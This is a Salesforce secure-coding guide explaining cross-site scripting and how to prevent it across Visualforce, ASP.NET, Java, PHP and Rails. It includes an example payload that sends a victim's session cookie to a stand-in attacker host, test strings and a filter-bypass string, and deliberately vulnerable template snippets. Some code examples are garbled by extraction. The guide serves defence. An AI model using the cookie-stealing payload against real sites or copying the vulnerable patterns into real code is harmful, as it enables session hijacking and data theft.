Cross-Site Scripting (XSS)
What is it?
Cross-site scripting is a vulnerability that occurs when an attacker
can insert unauthorized JavaScript, VBScript, HTML, or other active
content into a web page viewed by other users. A malicious script
inserted into a page in this manner can hijack the user’s session,
submit unauthorized transactions as the user, steal confidential
information, or simply deface the page. Cross-site scripting is one of
the most serious and most common attacks against web applications today.
XSS allows malicious users to control the content and code on your site — something only you should be able to do!
Sample vulnerability
Consider a web application with a search feature. The user sends
their query as a GET parameter, and the page displays the parameter in
the page:
Request: http://example.com/search?q=apples
Response: “You searched for: apples”
An XSS attack could take place if the user were visiting another site that included the following code:
2 | src= "<a rel=" nofollow " class=" external free " href=" http: |
The user’s browser will load the iframe by requesting http://example.com/search?q=<script>...
. In response, example.com will echo back You searched for “<script>document.location='http://cybervillians.com/?session='+document.cookie</script>”
. Unfortunately, the victim’s browser will interpret the script as code, not as text, and then execute the script in the context of the user’s session with example.com! It will be as if example.com developers had written their page that way.
In this case, the attack payload sends the value of document.cookie
(that is, the user’s example.com cookie) to the attacker’s web site
(cybervillains.com). However, there is essentially no limit to the
payloads the attacker could have provided. Anything example.com
developers can do with HTML and JavaScript, the attacker can also do.
Is my application vulnerable?
Cross-site scripting is one of the most common security
vulnerabilities in web sites. Estimates of the percentage of web sites
vulnerable to XSS range from 50% to as high as 80%. Most applications
that do not have an explicit and uniformly applied set of input
validators and output encoders designed to prevent XSS will have
vulnerabilities.
How can I test my application?
You can perform a few simple tests to see if your application is
vulnerable, but do not get overconfident if you do not discover a
vulnerability immediately. Any XSS vulnerability anywhere on your web
site can completely compromise the security of your users.
Salesforce.com highly recommends using a web application security
scanning tool to perform comprehensive testing for XSS across your
entire web site.
Burp Suite Professional
provides good capabilities, including XSS scanning, at a reasonable
price. Information on using the Burp Scanner feature of the suite to
test for XSS is available in the help file at http://portswigger.net/scanner/help.html.
The most basic test payload for XSS is a simple script that
displays a browser pop-up if the site is vulnerable. Try submitting the
string <script>alert('XSS');</script>
for any
form input that is later displayed by the application. If you don’t see
the popup, look at the source for the page where the input is displayed.
Are the angle-brackets encoded (< and >)? Is the script
simply not in the correct context in the page to execute?
Unfortunately, testing for XSS is not a simple proposition, even
with an automated scanner. Some browsers may defend you from simple XSS
attacks, leading you to believe the site is safe — but users with other
browsers will be vulnerable. (And it is impossible for the browser to
correctly stop all XSS attacks.) XSS can happen in many places and
contexts. The inputs that create XSS in a tag content context will be
different from those that work in an attribute, event handler, or script
context. Different browsers interpret malformed HTML differently, and
tricks of encoding and obfuscation may be used to bypass a variety of
filters. The XSS Cheat Sheet hosted at ha.ckers.org demonstrates dozens of variants on XSS attacks.
XSS also comes in two variants: reflected XSS, demonstrated above, and persistent or stored
XSS. Stored XSS happens when data enters an application in one location
and the attack payload is stored and displayed by the system somewhere
else. This might happen in a bulletin board application, or web-based
news or email archives. Any application that stores user input and later
displays it to other users can potentially be vulnerable to stored XSS
attacks.
It should be apparent that testing even a small web application
on the most popular browsers can require many thousands of test cases.
XSS is an example of why an application cannot be tested into being
secure — it must be engineered to be secure. Strong input filtering and
output encoding, universally applied and verified through careful code
review, is the best solution for preventing XSS.
For more information on this attack in general, see the following articles:
How do I protect my application?
Apex and Visualforce Applications
The Force.com platform provides several anti-XSS defenses. For
example, we have implemented filters that screen out harmful characters
in most output methods. For the developer using standard classes and
output methods, the threats of XSS flaws have been largely mitigated.
However, the creative developer can still find ways to
intentionally or accidentally bypass the default controls. The following
sections explain where protection does and does not exist.
Existing Protection
All standard Visualforce components (tags of the form
<apex:...>) have anti-XSS filters in place. For example, the
following code would normally be vulnerable to an XSS attack because it
takes user-supplied input and outputs it directly back to the user. But
the <apex:outputText> tag is XSS-safe. All characters that appear
to be HTML tags will be converted to their literal form. For example,
the < character will be converted to < so that a literal <
will display on the user’s screen.
2 | {!$CurrentPage.parameters.userInput} |
Disabling escape on Visualforce tags
By default, nearly all Visualforce tags escape the XSS-vulnerable
characters. It is possible to disable this behavior by setting the
optional attribute escape="false"
. For example, the following code would be vulnerable to XSS attacks:
1 | <apex:outputText escape= "false" |
2 | value= "{!$CurrentPage.parameters.userInput}" / > |
Programming Constructs That Are Not Protected From XSS
The following mechanisms do not have built-in XSS protections and you
should take extra care when using these tags and objects. The reason is
simply because these items were intended to allow the developer to
customize the page by inserting script commands. It would not make sense
to include anti-XSS filters on commands that are intentionally added to
a page.
S-Controls and Custom JavaScript
If you write your own JavaScript or S-controls, the Force.com
platform has no way to protect you. For example, the following code is
vulnerable to XSS if used in JavaScript:
2 | var foo = location. search ; |
The <apex:includeScript>
Visualforce component
allows you to include a custom script on the page. In these cases be
very careful to validate that the content is sanitized and does not
include user-supplied data. For example, the following snippet is
extremely vulnerable as it is including user-supplied input as the value
of the script text. The value provided by the tag is a URL to the
JavaScript to include. If an attacker can supply arbitrary data to this
parameter (as in the example below), they can potentially direct the
victim to include any JavaScript file from any other web site.
1 | <apex:includeScript value= "{!$CurrentPage.parameters.userInput}" / > |
S-Control Template and Formula Tags
S-Controls give the developer direct access to the HTML page itself
and includes an array of tags that can be used to insert data into the
pages. As described above, S-Controls do not use any built-in XSS
protections. When using the template and formula tags, all output is
unfiltered and must be validated by the developer.
The general syntax of these tags is: {!FUNCTION()}
or {!$OBJECT.ATTRIBUTE}
.
For example, if a developer wanted to include a user’s session ID
and in a link, they could create the link using the following syntax:
Which would render output similar to
2 | href= "<a rel=" nofollow " class=" external free " href=" http: |
Formula expressions can be function calls or include information
about platform objects, a user’s environment, system environment, and
the request environment. An important feature of these expressions is
that data is not escaped during rendering. Since expressions are
rendered on the server, it is not possible to escape rendered data on
the client using JavaScript or other client-side technology. This can
lead to potentially dangerous situations if the formula expression
references non-system data (i.e. potentially hostile or editable) and
the expression itself is not wrapped in a function to escape the output
during rendering. A common vulnerability is created by the use of the {!$Request.*}
expression to access request parameters:
1 | <html> <head> <title> {!$Request.title} </title> </head> <body> Hello |
This will cause the server to pull the title parameter from the request and embed it into the page. So, the request
would produce the rendered output
1 | <html> <head> <title> Hola </title> </head> <body> Hello |
Unfortunately, the unescaped {!$Request.title}
tag also results in a cross-site scripting vulnerability. For example, the request
results in the output
1 | <html> <head> <title> Adios </title> <script> alert( 'xss' ) </script> </title> </head> <body> Hello |
The standard mechanism to do server-side escaping is through the use of the JSENCODE, HTMLENCODE, JSINHTMLENCODE, and URLENCODE functions or the traditional SUBSTITUTE formula tag. Given the placement of the {!$Request.*}
expression in the example, the above attack could be prevented by using the following nested HTMLENCODE calls:
4 | {!HTMLENCODE($Request.title)} |
7 | <body> Hello world! </body> |
Depending on the placement of the tag and usage of the data, both the
characters needing escaping as well as their escaped counterparts may
vary. For instance, this statement:
1 | <script> var ret = "{!$Request.retURL}" ; </script> |
would require that the double quote character be escaped with its URL
encoded equivalent of %22 instead of the HTML escaped ", since it’s
likely going to be used in a link. Otherwise, the request
would result in
1 | <script> var ret = "foo" ;alert( 'xss' ); |
Additionally, the ret variable may need additional
client-side escaping later in the page if it is used in a way which may
cause included HTML control characters to be interpreted. Examples of
correct usage are below:
3 | var ret = "{!URLENCODE($Request.retURL)}" ; |
4 | window.location.href = ret; |
3 | var title = "{!JSINHTMLENCODE($Request.title)}" ; |
4 | document.getElementById( 'titleHeader' ).innerHTML = title; |
3 | var pageNum = {!JSENCODE($Request.PageNumber)}; |
Formula tags can also be used to include platform object data. Although
the data is taken directly from the user’s org, it must still be escaped
before use to prevent users from executing code in the context of other
users (potentially those with higher privilege levels.) While these
types of attacks would need to be performed by users within the same
organization, they would undermine the organization’s user roles and
reduce the integrity of auditing records. Additionally, many
organizations contain data which has been imported from external
sources, which may not have been screened for malicious content.
General Guidance
Protecting your application from XSS risks requires a two-layered strategy: input filtering and output filtering and encoding.
The goal of input filtering is to constrain inputs to
their expected format and to render any dangerous input harmless by
removing dangerous characters. It is always safer to constrain inputs to
known-good values than to try to filter dangerous characters. A filter
that removes the characters <, >, and " in a user nickname field
may prevent XSS attacks when the content is inserted into a page in the
context of an HTML element, but what if the input is used in the context
of a <script> block, such as the script used to calculate site
analytics? In that case, an exploit may not need to use those
characters, and filtering on characters like parentheses, periods and
semicolons may be necessary. A simple regular expression that only
allowed alphabetic characters would prevent both attacks and greatly
reduces the likelihood of missing characters that are dangerous in other
contexts.
Remember that all user input must be filtered. GET and POST form
parameters are not the only place that malicious data may originate. No
part of an HTTP request can be trusted. XSS payloads might originate in a
user’s cookie or other headers like Referer. Treat all input as
suspicious.
Output encoding is the second, and arguably more
important, defense. Output encoding refers to rewriting data such that
it cannot “break out” of the structural context into which it is
inserted. For most scenarios, HTML encoding will be the most
appropriate; that is, encoding the characters <, > and " into their HTML entity equivalents: <, >, and ".
Nearly all web frameworks will have utility classes or methods for
performing this encoding, and using a page templating or a DOM-aware
framework that automatically encodes all output, by default, is one of
the best defenses against XSS.
Note that ' is the XML entity for the apostrophe and is not a
valid HTML entity! In an HTML context you will need to use the Unicode
escape sequence '.
Inserting text into a JavaScript context is more difficult and
should only be done inside of a variable context that will be used
strictly as data. JavaScript uses a backslash encoding similar to C and
C++. Be cautious when inserting data into a script variable: escape
single and double quotes (and the backslash character itself) to prevent
injection. Prefer the Unicode encoding format, \udddd (4 hex digits: dddd), to prevent any browser parsing problems.
Cascading style sheets (CSS) are also a potential location
for XSS attacks and so should be encoded carefully or user-specified
style attributes disallowed.
Output filtering is similar to input filtering, and should
be applied in contexts when output encoding may not be adequate. User
data inserted directly into a <script> context, for example,
cannot be encoded in a way which makes it safe. The only solution in
such a situation is to constrain the data to ensure they do not contain
any dangerous characters such as parentheses, periods, and single or
double quotes.
Why is output encoding and filtering important if we have already
performed input filtering? Many applications do not exclusively display
input taken from web forms. Dangerous data might have been imported
from a database or spreadsheet, originate from an email message or some
other source where input filtering has not been applied. In some cases,
data that meet the requirements of an input filter may nevertheless be
unsafe when used in a particular output context.
If your application allows users to include HTML tags by design,
you must exercise great caution in what tags are allowed. The following
tags may allow injection of script code and should not be allowed:
- <applet>
- <body>
- <embed>
- <frame>
- <script>
- <frameset>
- <html>
- <iframe>
- <img>
- <style>
- <layer>
- <link>
- <ilayer>
- <meta>
- <object>
Be aware that the above list cannot be exhaustive. Similarly, there
is no complete list of JavaScript event handler names (although see this page on Quirksmode), so there can be no perfect list of bad HTML element attribute names.
Instead, it makes more sense to create a well-defined known-good
subset of HTML elements and attributes. Using your programming
language’s HTML or XML parsing library, create an HTML input handling
routine that throws away all HTML elements and attributes not on the
known-good list. This way, you can still allow a wide range of text
formatting options without taking on unnecessary XSS risk. Creating such
an input validator is usually around 100 lines of code in a language
like Python or PHP; it might be more in Java but is still very
tractable.
Output filtering and encoding for URLs including user data
requires some special considerations. If you return user-controlled
data as part of a URL, URL encode that data. (URL encoding translates
space to ‘+’ and uses %xx hex encoding for unsafe or
non-ASCII-printable characters.) If you allow users to specify an entire
URL to link to arbitrary content, ensure that the scheme of the URL is
constrained to valid types (e.g. http:, https:, mailto: and possibly
ftp:). Allowing users to specify other URL schemes may lead to XSS, such
as with the javascript: and data: schemes.
When possible, set the HttpOnly attribute on your cookies. This flag tells the browser to reveal the cookie only over HTTP or HTTPS connections, but to have document.cookie
evaluate to a blank string when JavaScript code tries to read it. (Some
browsers do still let JavaScript code overwrite or append to document.cookie, however.) If your application does require the ability for JavaScript to read the cookie, then you won’t be able to set HttpOnly. Otherwise, you might as well set this flag.
Note that HttpOnly is not a defense against XSS, it is
only a way to briefly slow down attackers exploiting XSS with the
simplest possible attack payloads. It is not a bug or vulnerability for
the HttpOnly flag to be absent.
Stored XSS Resulting from Arbitrary User Uploaded Content
Applications such as Content Management, Email Marketing, etc. may
need to allow legitimate users to create and/or upload custom HTML,
Javascript or files. This feature could be misused to launch XSS
attacks. For instance, a lower privileged user could attack an
administrator by creating a malicious HTML file that steals session
cookies. The recommended protection is to serve such arbitrary content
from a separate domain outside of the session cookie's scope.
Let’s say cookies are scoped to https://app.site.com.
Even if customers can upload arbitrary content, you can always serve
the content from an alternate domain that is outside of the scoping of
any trusted cookies (session cookies and other sensitive information).
As an example, pages on https://app.site.com would reference customer-uploaded HTML templates as IFRAMES using a link to https://content.site.com/cust1/templates?templId=13&auth=someRandomAuthenticationToken
The authentication token would substitute for the session cookie
since sessions scoped to app.site.com would not be sent to
content.site.com. If the data being stored is sensitive, a one time use
or short lived token should be used. This is the method that
salesforce.com uses for our content product.
HTTP Response Splitting
HTTP response splitting is a vulnerability closely related to XSS,
and for which the same defensive strategies apply. Response splitting
occurs when user data is inserted into an HTTP header returned to the
client. Instead of inserting malicious script, the attack is to insert
additional newline characters. Because headers and the response body are
delimited by newlines in HTTP, this allows the attacker to insert their
own headers and even construct their own page body (which might have an
XSS payload inside). To prevent HTTP response splitting, filter ‘\n’ and ‘\r’ from any output used in an HTTP header.
ASP.NET
ASP.NET provides several built-in mechanisms to help prevent XSS, and
Microsoft supplies several free tools for identifiying and preventing
XSS in sites built with .NET technology.
An excellent general discussion of preventing XSS in ASP.NET 1.1
and 2.0 can be found at the Microsoft Patterns & Practices site:
By default, ASP.NET enables request validation on all pages, to
prevent accepting of input containing unencoded HTML. (For more details
see http://www.asp.net/learn/whitepapers/request-validation/.)
Verify in your Machine.config and Web.config that you have not disabled
request validation. Identify and correct any pages that may have
disabled it individually by searching for the ValidateRequest request attribute in the page declaration tag. If this attribute is not present, it defaults to true.
Input Validation
For server controls in ASP.NET, it is simple to add server-side input validation using <asp:RegularExpressionValidator>
.
If you are not using server controls, you can use the Regex class in the System.Text.RegularExpressions namespace or use other supporting classes for validation.
For example regular expressions and tips on other validation routines for numbers, dates, and URL strings, see Microsoft Patterns & Practices: “How To: Protect from Injection Attacks in ASP.NET”.
Output Filtering & Encoding
The System.Web.HttpUtility class provides convenient methods, HtmlEncode and UrlEncode
for escaping output to pages. These methods are safe, but follow a
“blacklist” approach that encodes only a few characters known to be
dangerous. Microsoft also makes available the AntiXSS Library that
follows a more restrictive approach, encoding all characters not in an
extensive, internationalized whitelist. You can get more information and
download AntiXSS here:
Tools and Testing
Microsoft provides a free static analysis tool, CAT.NET.
CAT.NET is a snap-in to Visual Studio that helps identify XSS as well as
several other classes of security flaw. Version 1 of the tool is
available as a Community Technical Preview from the Microsoft download
site:
Java
J2EE web applications have perhaps the greatest diversity of
frameworks available for handling user input and creating pages. Several
strong, all-purpose libraries are available, but it is important to
understand what your particular platform provides.
Input Filtering
Take advantage of built-in framework tools to validate input as it is being used to generate business or model objects. In Struts, input validation rules can be defined in XML using the Validator Plugin in your struts-config.xml:
1 | <plug- in className= "org.apache.struts.validator.ValidatorPlugIn" > |
2 | <set-property property= "pathnames" value= "/WEB-INF/validator-rules.xml" / > |
Or you can build programmatic validation directly into your form beans with regular expressions.
Learn more about Java regular expressions here:
The Spring Framework also provides utilities for building automatic validation into data binding. You can implement the org.springframework.validation.Validator interface with the help of Spring’s ValidationUtils class to protect your business objects. Get more information here:
A more generic approach, applicable to any kind of Java object, is presented by the OVal object validation framework. OVal allows constraints on objects to be declared with annotations, through POJOs
or in XML, and expressing custom constraints as Java classes or in a
variety of scripting languages. The system is quite powerful, implements
Programming by Contract features using AspectJ, and provides some
built-in support for frameworks like Spring. Learn more about OVal at:
Output Filtering and Encoding
JSTL tags such as <c:out>
have the excapeXml attribute set to true
by default, This default behavior ensures that HTML special characters
are entity-encoded and prevents many XSS attacks. If any tags in your
application set escapeXml="false"
(such as for outputting the Japanese yen symbol) you need to apply some other escaping strategy. For JSF, the tag attribute is escape, and is also set to true by default for <h:outputText>
and <h:outputFormat>
.
Other page generation systems do not always escape output by
default. Freemarker is one example. All application data included in a
Freemarker template should be surrounded with an <#escape>
directive to do output encoding (e.g. <#escape x as x?html>
) or by manually adding ?html
(or ?js_string
for JavaScript contexts) to each expression (e.g. ${username?html}
).
Custom JSP tags or direct inclusion of user data variables with JSP expressions (e.g. <%= request.getHeader("HTTP_REFERER") %>
) or scriptlets (e.g. <% out.println(request.getHeader("HTTP_REFERER") %>
) should be avoided.
If you are using a custom page-generation system, one that does
not provide output escaping mechanisms, or building directly with
scriptlets, there are several output encoding libraries available. The
OWASP Enterprise Security API for Java is a mature project that offers a
variety of security services to J2EE applications. The org.owasp.esapi.codecs package provides classes for encoding output springs safely for HTML, JavaScript and several other contexts. Get it here:
Other libraries to consider include the Apache Commons Lang StringEscapeUtils class or the multi-plaform Reform library from the OWASP Encoding Project.
PHP
Input Filtering
As of PHP 5.2.0, data filtering is a part of the PHP Core. The package documentation is available at:
Two types of filters can be declared: sanitization filters that strip
or encode certain characters, and validation filters that can apply
business logic rules to inputs. The Zend Developer Zone has a good
tutorial on how to use the Filter extension, including the legacy
package for earlier versions of PHP and demonstrating an example of a
more complex validation using a callback:
Output Encoding
PHP provides two built-in string functions for encoding HTML output. htmlspecialchars encodes only &, ", ', <, and >, while htmlentities encodes all HTML characters with defined entities.
For bulletin-board like functionality where HTML content is intended to be included in output, the strip_tags
function is also available to return a string with all HTML and PHP
tags removed, but because this function is implemented with a regex that
does not validate that incoming strings are well-formed HTML, partial
or broken tags may be able to bypass the system. For example, the string
<<b>script>alert('xss');<</b>/script>
might have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>
.
If you are going to rely on this function, input must be sent to an
HTML validating and tidying program first. (Note that in PHP 5.2.6, strip_tags does appear to work, reducing the aforementioned attack string to alert('xss')
. Does it work in your version?)
For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-plaform Reform library from the OWASP Encoding Project contains PHP implementations of strong output filters for several contexts.
Ruby on Rails
Input Filtering
Older versions of Ruby on Rails used a vulnerable blacklist approach
built on trying to recognize and remove tags. This suffered from
vulnerabilities if applied to strings that had broken or partial HTML.
For example, the string <<b>script>alert('xss');<</b>/script>
would have the <b> and </b> tags removed, leaving the vulnerable string <script>alert('xss');</script>
. For this reason, avoid the strip_tags and strip_links methods in favor of the updated Rails 2 method sanitize.
See the Ruby on Rails Security guide for more information:
Output Encoding
Strings written by <%= %>
in rhtml templates are not escaped by default. the escapeHtml (or its shorthand, h) can be used to entity encode HTML characters, but you must be careful to do this in every location where user input is used.
For a more comprehensive approach that combines encoding with an extensive whitelist, the multi-plaform
Reform library from the OWASP Encoding Project contains Ruby implementations of strong output filters for several contexts.